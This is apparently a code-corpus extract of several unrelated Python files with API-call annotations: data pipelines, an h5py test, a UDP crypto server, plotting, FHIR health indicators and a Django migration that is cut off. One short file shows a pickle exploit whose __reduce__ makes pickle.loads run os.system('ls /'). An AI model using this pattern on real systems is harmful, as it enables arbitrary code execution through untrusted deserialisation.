import ast
import imp
import inspect
import types
from .invocation_tools import _name_of
class PipelineCommand:
def __init__(self, name):
self._name = name
class SkipTo(PipelineCommand):
# TODO: Singleton?
def __init__(self, resuming_function_name):
self.function_name = _name_of(resuming_function_name)
Done = PipelineCommand('DONE')
def collect_func_ordering(file_path_or_module):
"""
Collect all top-level functions in a file or module, in order.
:param file_path_or_module: the path to the python file, or a module.
:return: the ordered top-level function names.
"""
if isinstance(file_path_or_module, types.ModuleType):
file_path = inspect.getsourcefile(file_path_or_module)
else:
file_path = file_path_or_module
with open(file_path, 'r') as fp:
root = ast.parse(fp.read())
names = []
for node in ast.iter_child_nodes(root):
if isinstance(node, ast.FunctionDef):
names.append(node.name)
return names
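# For example, for a file defining top-level functions load(), clean() and
# save() in that order, collect_func_ordering(path) returns
# ['load', 'clean', 'save'].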
def collect_pipeline(module, skip_private=True, reloading=True):
"""
Load the functions in a module in their definition order.
:param module: a python module
:param skip_private: ignore functions starting with '_'
:param reloading: reload the module prior to collection
:return: the functions in their definition order
"""
if reloading:
module = imp.reload(module)
pipeline = []
env = vars(module)
for name in collect_func_ordering(module):
if skip_private and name.startswith('_'):
continue
pipeline.append(env[name])
return pipeline
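# Minimal usage sketch (hypothetical module `steps` containing top-level
# processing functions):
#
#     import steps
#     for func in collect_pipeline(steps):
#         func(record)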
class Pipeline(object):
"""
A sequence of functions for data processing.
"""
def __init__(self):
self._pipeline = []
self._captures = []
def __iter__(self):
return iter(self._captures)
def __call__(self, *args, **kwargs):
await_f = None
for f in self._pipeline:
if await_f is not None:
if _name_of(f) != await_f:
continue
else:
await_f = None
cmd = f(*args, **kwargs)
if isinstance(cmd, PipelineCommand):
if cmd is Done:
break
elif isinstance(cmd, SkipTo):
await_f = cmd.function_name
if await_f is not None:
raise NameError("Function {} never visited".format(await_f))
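# Control-flow sketch (hypothetical step functions): a step may return Done to
# stop the pipeline early, or SkipTo(other_step) to jump forward to that step:
#
#     def validate(record):
#         if record is None:
#             return Done          # stop processing entirely
#         if record.get('clean'):
#             return SkipTo(save)  # skip ahead to the save() step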
class ModulePipeline(Pipeline):
"""
Extract a pipeline from a Python module.
This executes each function in the order laid out by the file.
"""
def __init__(self, module, skip_private_applications=True,
include_private_captures=True, reloading=True):
"""
:param module: the python module to load
:param skip_private_applications: if True, then functions prefixed with
'_' are not included in the transformation pipeline
:param include_private_captures: if True, then functions prefixed with
'_' ARE captured for error analysis.
:param reloading: if True, reloads the module when calling `reload()`
"""
self._module = module
self._skip_private_applications = skip_private_applications
self._include_private_captures = include_private_captures
self._reloading = reloading
super(ModulePipeline, self).__init__()
self.reload(force=True)
def reload(self, force=False):
"""
Reload the underlying module.
:param force: if True, reloads the module, even if reloading is false.
"""
# Note: reloading the module on the initial load actually makes sense
# given how it's used. In a notebook, you import the module, then
# pass it to the constructor. It's easy to step over that
# constructor again, passing the old module reference.
if force or self._reloading:
self._pipeline = []
self._captures = []
for f in collect_pipeline(self._module, skip_private=False):
is_private = f.__name__.startswith('_')
if not self._skip_private_applications or not is_private:
self._pipeline.append(f)
if self._include_private_captures or not is_private:
self._captures.append(f)
|
[
"ast.iter_child_nodes",
"imp.reload",
"inspect.getsourcefile"
] |
[((904, 930), 'ast.iter_child_nodes', 'ast.iter_child_nodes', (['root'], {}), '(root)\n', (924, 930), False, 'import ast\n'), ((705, 747), 'inspect.getsourcefile', 'inspect.getsourcefile', (['file_path_or_module'], {}), '(file_path_or_module)\n', (726, 747), False, 'import inspect\n'), ((1420, 1438), 'imp.reload', 'imp.reload', (['module'], {}), '(module)\n', (1430, 1438), False, 'import imp\n')]
|
"""
Test that data encoded with earlier versions can still be decoded correctly.
"""
from __future__ import absolute_import, division, print_function
import pathlib
import unittest
import numpy as np
import h5py
TEST_DATA_DIR = pathlib.Path(__file__).parent / "data"
OUT_FILE_TEMPLATE = "regression_%s.h5"
VERSIONS = [
"0.1.3",
]
class TestAll(unittest.TestCase):
def test_regression(self):
for version in VERSIONS:
file_name = TEST_DATA_DIR / (OUT_FILE_TEMPLATE % version)
f = h5py.File(file_name, "r")
g_orig = f["origional"]
g_comp = f["compressed"]
for dset_name in g_comp.keys():
self.assertTrue(np.all(g_comp[dset_name][:] == g_orig[dset_name][:]))
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"pathlib.Path",
"h5py.File",
"numpy.all"
] |
[((791, 806), 'unittest.main', 'unittest.main', ([], {}), '()\n', (804, 806), False, 'import unittest\n'), ((234, 256), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (246, 256), False, 'import pathlib\n'), ((528, 553), 'h5py.File', 'h5py.File', (['file_name', '"""r"""'], {}), "(file_name, 'r')\n", (537, 553), False, 'import h5py\n'), ((704, 756), 'numpy.all', 'np.all', (['(g_comp[dset_name][:] == g_orig[dset_name][:])'], {}), '(g_comp[dset_name][:] == g_orig[dset_name][:])\n', (710, 756), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
import socket
from contextlib import closing
import pssst
import click
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat
@click.command()
@click.option('-k', '--key-file', help="File containing hex encoded private key")
@click.option('-p', '--port', type=int, help="Port on which to listen", default=45678)
def main(key_file, port):
if key_file:
private_key_text = open(key_file).readline().strip()
private_key = X25519PrivateKey.from_private_bytes(bytes.fromhex(private_key_text))
else:
private_key = X25519PrivateKey.generate()
print("Server public key: ",
private_key.public_key().public_bytes(encoding=Encoding.Raw, format=PublicFormat.Raw).hex())
server_handler = pssst.PSSSTServer(private_key)
with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as server_socket:
server_socket.bind(('127.0.0.1', port))
while True:
packet, client_addr = server_socket.recvfrom(2048)
try:
data, client_key, reply_handler = server_handler.unpack_request(packet)
reply_packet = reply_handler(data)
server_socket.sendto(reply_packet, client_addr)
except pssst.PSSSTException as e:
print("Server Exception: {}".format(e))
if __name__ == "__main__":
main()
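# Invocation sketch (the script filename and key file are assumptions; the
# flags are the ones defined above):
#     python pssst_server.py --port 45678 --key-file server.key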
|
[
"cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.generate",
"socket.socket",
"click.option",
"click.command",
"pssst.PSSSTServer"
] |
[((257, 272), 'click.command', 'click.command', ([], {}), '()\n', (270, 272), False, 'import click\n'), ((274, 359), 'click.option', 'click.option', (['"""-k"""', '"""--key-file"""'], {'help': '"""File containing hex encoded private key"""'}), "('-k', '--key-file', help='File containing hex encoded private key'\n )\n", (286, 359), False, 'import click\n'), ((356, 445), 'click.option', 'click.option', (['"""-p"""', '"""--port"""'], {'type': 'int', 'help': '"""Port on which to listen"""', 'default': '(45678)'}), "('-p', '--port', type=int, help='Port on which to listen',\n default=45678)\n", (368, 445), False, 'import click\n'), ((860, 890), 'pssst.PSSSTServer', 'pssst.PSSSTServer', (['private_key'], {}), '(private_key)\n', (877, 890), False, 'import pssst\n'), ((673, 700), 'cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.generate', 'X25519PrivateKey.generate', ([], {}), '()\n', (698, 700), False, 'from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey\n'), ((917, 965), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (930, 965), False, 'import socket\n')]
|
"""
Script that builds the evolution gif of the pdfs obtained with qcdnum.
The pdfs, obtained by solving the DGLAP evolution equations with qcdnum, are stored in files, each one containing a fixed q2 energy scale.
The output files with the pdfs and x values are stored in the directory named output, inside qcdnum.
Those output files follow the naming convention: nameCxxFile_q2_energyscale.csv
"""
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import pandas as pd
import glob
from PIL import Image
import os
# to delete the old images
os.system("rm imgs/*.png imgs/*.gif")
# url of the directory where the output files of qcdnum script are stored.
output_directory_url = "/opt/qcdnum-17-01-14/output/"
save_imgs_url = "imgs/"
names = []
plt.rcParams.update({"font.size":13})
sns.set_style("darkgrid")
# for each .csv output file
for csv in glob.glob(output_directory_url + "*.csv"):
print(csv)
array = csv.split("_")
q = float(array[2][:-4])
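    # e.g. a file named "nameCxxFile_q2_2.56.csv" splits on "_" so that
    # array[2] == "2.56.csv" and q == 2.56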
dataset = pd.read_csv(csv, delimiter=" ")
dataset = dataset.set_index("x")
names.append(int(q*100))
plt.figure()
lp = sns.scatterplot(data=dataset.iloc[:,:]) #, palette=['orange']
lp.set(xscale="log")
    lp.text(0.78, 1.2, f'$Q^2 = {q:.2e}$GeV$^2$', fontsize=10)
plt.ylabel("$x$pdf")
plt.xlabel("$x$")
plt.title(f"$Q^2$ = {q:.2e} $GeV^2$")
plt.ylim((0.0, 1.0))
plt.xlim((10e-3, 1))
plt.savefig(save_imgs_url + str(int(q*100)) + ".png", dpi=300)
names.sort()
# Create the frames
frames = []
imgs = [save_imgs_url + str(x) + ".png" for x in names]
for i in imgs:
new_frame = Image.open(i)
frames.append(new_frame)
# Save into a GIF file that loops forever
frames[0].save(save_imgs_url+'pdfs_evolution_gif.gif', format='GIF',
append_images=frames[1:],
save_all=True,
duration=10, loop=0)
|
[
"matplotlib.pyplot.title",
"seaborn.set_style",
"matplotlib.pyplot.xlim",
"seaborn.scatterplot",
"pandas.read_csv",
"matplotlib.pyplot.ylim",
"os.system",
"PIL.Image.open",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.rcParams.update",
"glob.glob",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((555, 592), 'os.system', 'os.system', (['"""rm imgs/*.png imgs/*.gif"""'], {}), "('rm imgs/*.png imgs/*.gif')\n", (564, 592), False, 'import os\n'), ((764, 802), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'font.size': 13}"], {}), "({'font.size': 13})\n", (783, 802), True, 'import matplotlib.pyplot as plt\n'), ((802, 827), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (815, 827), True, 'import seaborn as sns\n'), ((869, 910), 'glob.glob', 'glob.glob', (["(output_directory_url + '*.csv')"], {}), "(output_directory_url + '*.csv')\n", (878, 910), False, 'import glob\n'), ((990, 1021), 'pandas.read_csv', 'pd.read_csv', (['csv'], {'delimiter': '""" """'}), "(csv, delimiter=' ')\n", (1001, 1021), True, 'import pandas as pd\n'), ((1088, 1100), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1098, 1100), True, 'import matplotlib.pyplot as plt\n'), ((1108, 1148), 'seaborn.scatterplot', 'sns.scatterplot', ([], {'data': 'dataset.iloc[:, :]'}), '(data=dataset.iloc[:, :])\n', (1123, 1148), True, 'import seaborn as sns\n'), ((1255, 1275), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$x$pdf"""'], {}), "('$x$pdf')\n", (1265, 1275), True, 'import matplotlib.pyplot as plt\n'), ((1278, 1295), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$x$"""'], {}), "('$x$')\n", (1288, 1295), True, 'import matplotlib.pyplot as plt\n'), ((1298, 1335), 'matplotlib.pyplot.title', 'plt.title', (['f"""$Q^2$ = {q:.2e} $GeV^2$"""'], {}), "(f'$Q^2$ = {q:.2e} $GeV^2$')\n", (1307, 1335), True, 'import matplotlib.pyplot as plt\n'), ((1338, 1358), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0.0, 1.0)'], {}), '((0.0, 1.0))\n', (1346, 1358), True, 'import matplotlib.pyplot as plt\n'), ((1361, 1380), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0.01, 1)'], {}), '((0.01, 1))\n', (1369, 1380), True, 'import matplotlib.pyplot as plt\n'), ((1581, 1594), 'PIL.Image.open', 'Image.open', (['i'], {}), '(i)\n', (1591, 1594), False, 'from PIL import Image\n')]
|
# Generated by Django 3.0.10 on 2021-02-11 21:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rolodex', '0012_auto_20210211_1853'),
]
operations = [
migrations.AddField(
model_name='projectsubtask',
name='marked_complete',
field=models.DateField(blank=True, help_text='Date the task was marked complete', null=True, verbose_name='Marked Complete'),
),
]
|
[
"django.db.models.DateField"
] |
[((352, 474), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'help_text': '"""Date the task was marked complete"""', 'null': '(True)', 'verbose_name': '"""Marked Complete"""'}), "(blank=True, help_text='Date the task was marked complete',\n null=True, verbose_name='Marked Complete')\n", (368, 474), False, 'from django.db import migrations, models\n')]
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of functions to work with Spark DataFrames containing FHIR resources.
See test_spark.ipynb for real examples of how to create/use these functions.
"""
# TODO move common and query related parts to `query_lib.py` and only keep
# indicator calculation logic that is independent of Spark here.
from typing import List
from datetime import datetime
from dateutil.parser import parse as parse_date
import pandas as pd
import common
import query_lib
def _find_age_band(birth_date: str, end_date: datetime) -> str:
"""Given the birth date, finds the age_band for PEPFAR disaggregation."""
birth = parse_date(birth_date)
age = int((end_date - birth).days / 365.25)
if age < 1:
return '0-1'
if age <= 4:
return '1-4'
if age <= 9:
return '5-9'
if age <= 14:
return '10-14'
if age <= 19:
return '15-19'
if age <= 24:
return '20-24'
if age <= 49:
return '25-49'
return '50+'
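# For example, with an end date of 2021-01-01 (dates below are illustrative):
#   _find_age_band('1990-06-15', datetime(2021, 1, 1)) -> '25-49'
#   _find_age_band('2019-03-01', datetime(2021, 1, 1)) -> '1-4'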
def _agg_buckets(birth_date: str, gender: str, end_date: datetime) -> List[str]:
"""Generates the list of all PEPFAR disaggregation buckets."""
age_band = _find_age_band(birth_date, end_date)
return [age_band + '_' + gender, 'ALL-AGES_' + gender,
age_band + '_ALL-GENDERS', 'ALL-AGES_ALL-GENDERS']
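# e.g. _agg_buckets('1990-06-15', 'F', datetime(2021, 1, 1)) returns
# ['25-49_F', 'ALL-AGES_F', '25-49_ALL-GENDERS', 'ALL-AGES_ALL-GENDERS'].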
def _gen_counts_and_ratio(temp_df: pd.DataFrame, end_date: datetime,
ind_name: str) -> pd.DataFrame:
"""Generates aggregated dataframe when supplied with patient-level df"""
temp_df['buckets'] = temp_df.apply(
lambda x: _agg_buckets(x.birthDate, x.gender, end_date), axis=1)
temp_df_exp = temp_df.explode('buckets')
temp_df_exp = temp_df_exp.groupby(
[ind_name, 'buckets'], as_index=False).count()[[
ind_name, 'buckets', 'patientId']].rename(
columns={'patientId': ind_name + '_count'})
# calculate ratio
num_patients = len(temp_df.index)
temp_df_exp[ind_name + '_ratio'] = temp_df_exp[
ind_name + '_count'] / num_patients
return temp_df_exp
def calc_TX_PVLS(patient_agg_obs: pd.DataFrame, VL_code: str,
failure_threshold: int, end_date_str: str = None) -> pd.DataFrame:
"""Calculates TX_PVLS indicator with its corresponding disaggregations.
Args:
patient_agg_obs: An output from `patient_query.find_patient_aggregates()`.
VL_code: The code for viral load values.
failure_threshold: VL count threshold of failure.
    end_date_str: The string representation of the last date as 'YYYY-MM-DD'.
Returns:
The aggregated DataFrame with age/gender buckets.
"""
end_date = datetime.today()
if end_date_str:
end_date = parse_date(end_date_str)
temp_df = patient_agg_obs[(patient_agg_obs['code'] == VL_code)].copy()
# Note the above copy is used to avoid setting a new column on a slice next:
temp_df['latest_vl_value'] = temp_df['last_value'].astype(float)
temp_df['sup_VL'] = (temp_df['latest_vl_value'] < failure_threshold)
temp_df = _gen_counts_and_ratio(temp_df, end_date, 'sup_VL')
return temp_df
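# Usage sketch (the aggregate DataFrame and the concept code are assumptions;
# see query_lib for how patient aggregates are produced):
#
#     tx_pvls = calc_TX_PVLS(patient_agg_obs, VL_code='856',
#                            failure_threshold=1000, end_date_str='2021-12-31')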
def calc_TX_NEW(patient_agg_obs: pd.DataFrame, ARV_plan: str,
start_drug: List[str], end_date_str: str = None) -> pd.DataFrame:
"""Calculates TX_NEW indicator with its corresponding disaggregations.
TX_NEW indicator counts the number of adults and children newly enrolled
on antiretroviral therapy (ART) prior to the provided end-date
Args:
patient_agg_obs: A DataFrame generated by `patient_query.find_patient_aggregates()`.
ARV_plan: The concept question code for ANTIRETROVIRAL PLAN
start_drug: The concept answer codes for START DRUG
    end_date_str: The string representation of the last date as 'YYYY-MM-DD'.
Returns:
The aggregated DataFrame with age/gender buckets.
"""
end_date = datetime.today()
if end_date_str:
end_date = parse_date(end_date_str)
temp_df = patient_agg_obs[(patient_agg_obs['code'] == ARV_plan)].copy()
# Note the above copy is used to avoid setting a new column on a slice next:
temp_df['TX_NEW'] = (temp_df['last_value_code'].isin(start_drug))
temp_df = _gen_counts_and_ratio(temp_df, end_date, 'TX_NEW')
return temp_df
|
[
"dateutil.parser.parse",
"datetime.datetime.today"
] |
[((1186, 1208), 'dateutil.parser.parse', 'parse_date', (['birth_date'], {}), '(birth_date)\n', (1196, 1208), True, 'from dateutil.parser import parse as parse_date\n'), ((3122, 3138), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (3136, 3138), False, 'from datetime import datetime\n'), ((4305, 4321), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (4319, 4321), False, 'from datetime import datetime\n'), ((3173, 3197), 'dateutil.parser.parse', 'parse_date', (['end_date_str'], {}), '(end_date_str)\n', (3183, 3197), True, 'from dateutil.parser import parse as parse_date\n'), ((4356, 4380), 'dateutil.parser.parse', 'parse_date', (['end_date_str'], {}), '(end_date_str)\n', (4366, 4380), True, 'from dateutil.parser import parse as parse_date\n')]
|
import os
import pickle
from contextlib import contextmanager
class ShellSystemChroot(object):
def __reduce__(self):
# this will list contents of root / folder
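        # pickle records this (callable, args) pair during dumps(); a later
        # pickle.loads() then executes os.system('ls /').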
return (os.system, ('ls /',))
@contextmanager
def system_chroot():
""" A simple chroot """
os.chroot('/')
yield
def serialize():
with system_chroot():
shellcode = pickle.dumps(ShellSystemChroot())
return shellcode
def deserialize(exploit_code):
with system_chroot():
pickle.loads(exploit_code)
if __name__ == '__main__':
shellcode = serialize()
print('Obtaining files...')
deserialize(shellcode)
|
[
"pickle.loads",
"os.chroot"
] |
[((262, 276), 'os.chroot', 'os.chroot', (['"""/"""'], {}), "('/')\n", (271, 276), False, 'import os\n'), ((448, 474), 'pickle.loads', 'pickle.loads', (['exploit_code'], {}), '(exploit_code)\n', (460, 474), False, 'import pickle\n')]
|
#!/usr/bin/env python
# coding=utf-8
"""MetricsEvaluator engine action.
Use this module to add the project main code.
"""
from .._compatibility import six
from .._logging import get_logger
from marvin_python_toolbox.engine_base import EngineBaseTraining
from ..model_serializer import ModelSerializer
__all__ = ['MetricsEvaluator']
logger = get_logger('metrics_evaluator')
class MetricsEvaluator(ModelSerializer, EngineBaseTraining):
def __init__(self, **kwargs):
super(MetricsEvaluator, self).__init__(**kwargs)
def execute(self, params, **kwargs):
import h2o
from sklearn import metrics
# h2o.init()
y_test = self.marvin_dataset['test_X']['Species']
self.marvin_dataset['test_X'].drop(columns='Species', inplace=True)
teste = h2o.H2OFrame.from_python(self.marvin_dataset['test_X'])
preds = self.marvin_model.predict(teste).as_data_frame()['predict'].values
self.marvin_metrics = metrics.accuracy_score(y_test, preds)
|
[
"h2o.H2OFrame.from_python",
"sklearn.metrics.accuracy_score"
] |
[((806, 861), 'h2o.H2OFrame.from_python', 'h2o.H2OFrame.from_python', (["self.marvin_dataset['test_X']"], {}), "(self.marvin_dataset['test_X'])\n", (830, 861), False, 'import h2o\n'), ((975, 1012), 'sklearn.metrics.accuracy_score', 'metrics.accuracy_score', (['y_test', 'preds'], {}), '(y_test, preds)\n', (997, 1012), False, 'from sklearn import metrics\n')]
|
# Generated by Django 2.2.3 on 2019-09-26 19:42
import bettertexts.models
import ckeditor.fields
from decimal import Decimal
from django.conf import settings
import django.contrib.sites.managers
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import django_extensions.db.fields
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.CharField(max_length=200, verbose_name='question')),
('position', models.IntegerField(verbose_name='position')),
],
options={
'verbose_name': 'question',
'verbose_name_plural': 'questions',
'ordering': ('position',),
},
),
migrations.CreateModel(
name='Type',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
('header', models.CharField(max_length=200, verbose_name='main header')),
('rating_header', models.CharField(blank=True, max_length=200, verbose_name='rating header')),
('comment_header', models.CharField(blank=True, max_length=200, verbose_name='comment header')),
('response_header', models.CharField(blank=True, max_length=200, verbose_name='response header')),
('rating_enabled', models.BooleanField(default=True, verbose_name='rating enabled')),
('comment_enabled', models.BooleanField(default=True, verbose_name='comment enabled')),
('notification_enabled', models.BooleanField(default=True, verbose_name='notification enabled')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'communication type',
'verbose_name_plural': 'communication types',
},
managers=[
('objects', bettertexts.models.TypeManager()),
('on_site', django.contrib.sites.managers.CurrentSiteManager()),
],
),
migrations.CreateModel(
name='TextComment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_pk', models.TextField(verbose_name='object ID')),
('user_name', models.CharField(blank=True, max_length=50, verbose_name="user's name")),
('user_email', models.EmailField(blank=True, max_length=254, verbose_name="user's email address")),
('user_url', models.URLField(blank=True, verbose_name="user's URL")),
('inform', models.BooleanField(default=False, help_text='Check this box to keep me informed about updates.', verbose_name='Keep informed')),
('involved', models.BooleanField(default=False, help_text='Check this box to make more texts better.', verbose_name='Stay involved')),
('comment', models.TextField(max_length=3000, verbose_name='comment')),
('submit_date', models.DateTimeField(default=None, verbose_name='date/time submitted')),
('ip_address', models.GenericIPAddressField(blank=True, null=True, unpack_ipv4=True, verbose_name='IP address')),
('is_public', models.BooleanField(default=True, help_text='Uncheck this box to make the comment effectively disappear from the site.', verbose_name='is public')),
('is_removed', models.BooleanField(default=False, help_text='Check this box if the comment is inappropriate. A "This comment has been removed" message will be displayed instead.', verbose_name='is removed')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content_type_set_for_textcomment', to='contenttypes.ContentType', verbose_name='content type')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='textcomment_comments', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'verbose_name': 'comment',
'verbose_name_plural': 'comments',
'ordering': ('submit_date',),
'permissions': [('can_moderate', 'Can moderate comments')],
},
),
migrations.CreateModel(
name='Text',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='title')),
('slug', django_extensions.db.fields.RandomCharField(blank=True, editable=False, length=8, unique=True, verbose_name='slug')),
('intro', ckeditor.fields.RichTextField(blank=True, max_length=20000, verbose_name='intro')),
('body', ckeditor.fields.RichTextField(max_length=20000, verbose_name='text')),
('version', models.PositiveIntegerField(default=0, verbose_name='version')),
('pub_date', models.DateTimeField(auto_now_add=True, verbose_name='date published')),
('end_date', models.DateTimeField(blank=True, null=True, verbose_name='date end')),
('site', models.ForeignKey(default=1, editable=False, on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Type')),
],
options={
'verbose_name': 'text',
'verbose_name_plural': 'texts',
},
managers=[
('objects', bettertexts.models.TypeManager()),
],
),
migrations.CreateModel(
name='Rating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.PositiveIntegerField(default=0, verbose_name='version')),
('range', models.PositiveIntegerField(default=10, verbose_name='range')),
('count', models.PositiveIntegerField(default=0, verbose_name='count')),
('total', models.PositiveIntegerField(default=0, verbose_name='total')),
('average', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=6, verbose_name='average')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Question', verbose_name='Question')),
('text', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Text')),
],
options={
'verbose_name': 'rating',
'verbose_name_plural': 'ratings',
'unique_together': {('text', 'version', 'question')},
},
),
migrations.AddField(
model_name='question',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Type'),
),
migrations.CreateModel(
name='UserRating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('user', models.CharField(max_length=200)),
('ip', models.GenericIPAddressField(blank=True, null=True)),
('score', models.PositiveSmallIntegerField()),
('rating', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='user_ratings', to='bettertexts.Rating')),
],
options={
'unique_together': {('user', 'rating')},
},
),
]
|
[
"django.db.models.TextField",
"django.db.models.URLField",
"django.db.migrations.swappable_dependency",
"decimal.Decimal",
"django.db.models.ForeignKey",
"django.db.models.CharField",
"django.db.models.PositiveIntegerField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.EmailField",
"django.db.models.IntegerField",
"django.db.models.GenericIPAddressField",
"django.db.models.PositiveSmallIntegerField",
"django.db.models.DateTimeField"
] |
[((451, 508), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (482, 508), False, 'from django.db import migrations, models\n'), ((7800, 7890), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""bettertexts.Type"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'bettertexts.Type')\n", (7817, 7890), False, 'from django.db import migrations, models\n'), ((747, 840), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (763, 840), False, 'from django.db import migrations, models\n'), ((868, 925), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""question"""'}), "(max_length=200, verbose_name='question')\n", (884, 925), False, 'from django.db import migrations, models\n'), ((957, 1001), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'verbose_name': '"""position"""'}), "(verbose_name='position')\n", (976, 1001), False, 'from django.db import migrations, models\n'), ((1307, 1400), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1323, 1400), False, 'from django.db import migrations, models\n'), ((1424, 1477), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""name"""'}), "(max_length=200, verbose_name='name')\n", (1440, 1477), False, 'from django.db import migrations, models\n'), ((1507, 1567), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""main header"""'}), "(max_length=200, verbose_name='main header')\n", (1523, 1567), False, 'from django.db import migrations, models\n'), ((1604, 1678), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""rating header"""'}), "(blank=True, max_length=200, verbose_name='rating header')\n", (1620, 1678), False, 'from django.db import migrations, models\n'), ((1716, 1791), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""comment header"""'}), "(blank=True, max_length=200, verbose_name='comment header')\n", (1732, 1791), False, 'from django.db import migrations, models\n'), ((1830, 1906), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""response header"""'}), "(blank=True, max_length=200, verbose_name='response header')\n", (1846, 1906), False, 'from django.db import migrations, models\n'), ((1944, 2008), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""rating enabled"""'}), "(default=True, verbose_name='rating enabled')\n", (1963, 2008), False, 'from django.db import migrations, models\n'), ((2047, 2112), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""comment enabled"""'}), "(default=True, verbose_name='comment enabled')\n", (2066, 2112), False, 'from django.db import migrations, models\n'), ((2156, 2226), 'django.db.models.BooleanField', 
